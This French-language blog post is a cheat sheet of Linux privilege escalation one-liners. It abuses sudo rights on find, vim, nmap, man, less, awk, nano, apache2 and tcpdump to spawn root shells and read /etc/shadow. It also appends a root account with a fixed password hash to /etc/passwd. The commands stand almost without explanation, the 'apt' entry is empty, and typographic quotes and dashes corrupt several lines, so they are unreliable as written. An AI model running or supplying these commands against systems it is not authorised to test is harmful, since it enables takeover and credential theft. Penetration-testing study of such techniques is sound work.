Linux Privesc

1. One Line Privilege Escalation :

Avec la commande Find

sudo find /etc/passwd -exec /bin/sh \;
sudo find /bin -name nano -exec /bin/sh \;

Avec la commande Vim

sudo vim -c ‘!bash’ 

Avec la commande Nmap

sudo nmap –interactive
nmap> !sh
sh-4.1#

Une autre manière de faire sans –interactive

echo « os.execute(‘/bin/sh’) » > /tmp/shell.nse && sudo nmap –script=/tmp/shell.nse

Avec la commande MAN

sudo man man

after that press !sh and hit enter

Avec la commande Less/More

sudo less /etc/hosts
sudo less !ls #(execute la commande ls)
sudo more /etc/hosts

after that press !sh and hit enter

Avec la commande awk

sudo awk ‘BEGIN {system(« /bin/sh »)}’

Avec la commande nano

Ajoutez ceçi à /etc/passwd pour créer un nouvel utilisateur avec les droits root

sudo nano  /etc/passwd
touhid:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash

Changez d’utilistauer et utilisez le mdp : test

su touhid

Avec la commande apache

sudo apache2 -f /etc/shadow

Avec la commande apt :

Avec la commande tcpdump :

echo $’id\ncat /etc/shadow’ > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

Un commentaire

Laisser un commentaire

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

Logo WordPress.com

Vous commentez à l’aide de votre compte WordPress.com. Déconnexion /  Changer )

Photo Google

Vous commentez à l’aide de votre compte Google. Déconnexion /  Changer )

Image Twitter

Vous commentez à l’aide de votre compte Twitter. Déconnexion /  Changer )

Photo Facebook

Vous commentez à l’aide de votre compte Facebook. Déconnexion /  Changer )

Connexion à %s